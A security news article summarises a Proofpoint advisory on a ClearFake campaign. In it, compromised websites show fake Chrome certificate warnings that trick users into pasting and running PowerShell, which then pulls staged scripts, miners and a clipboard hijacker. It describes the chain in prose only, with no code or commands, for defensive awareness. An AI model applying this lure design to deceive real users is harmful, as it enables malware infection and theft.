Proofpoint uncovers social engineering technique
Proofpoint has uncovered a new social engineering technique attempting to coerce victims into copy and pasting malicious PowerShell scripts to infect their computers with malware.
The technique targets users of Google’s popular Chrome web browser. It has been observed as early as 1 March by the ClearFake attack campaign. ClearFake is a fake browser update activity cluster that compromises legitimate websites with malicious HTML and JavaScript.
As part of the technique, when a user visits a compromised website, they are presented with a fake warning overlay prompting them to install a ‘root certificate’ to be able to properly access the page. The message includes a button that copies code into the user’s cache and instructs them to open a PowerShell window, paste the malicious code and run it, Proofpoint said.
In the attack campaign observed by Proofpoint in May, the malicious code performed functions that can include flushing the DNS cache, removing clipboard content, displaying a decoy message to the user and downloading a remote PowerShell script and executing it in-memory.
The remote PowerShell script was used to download another PowerShell script, which itself obtained system temperatures as a check against virtual environments and sandboxes, and if none are found downloads a fourth PowerShell script that downloads a file named data.zip, extracts the content to find any .exe files.
This method was then used to download payloads including cryptocurrency minors, as well as a clipboard hijacker designed to replace cryptocurrency addresses in the clipboard with threat actor-controlled addresses.
“The attack chain is unique and aligns with the overall trend Proofpoint has observed of cybercriminal threat actors adopting new, varied and increasingly creative attack chains,” Proofpoint researchers said in a threat advisory. “Organisations should train users to identify the activity and report suspicious activity to their security teams. This is very specific training but can easily be integrated into an existing user training program.”
CrowdStrike to buy Adaptive Shield
CrowdStrike is augmenting its SaaS security capabilities through the acquisition of Israeli-based...
LockBit named nastiest malware of 2024
LockBit, a ransomware malware known to have been used to attack Australian targets, has been...
Extreme Networks launches ZTNA solution
Extreme Networks' new ExtremeCloud Universal ZTNA solution combines cloud network access...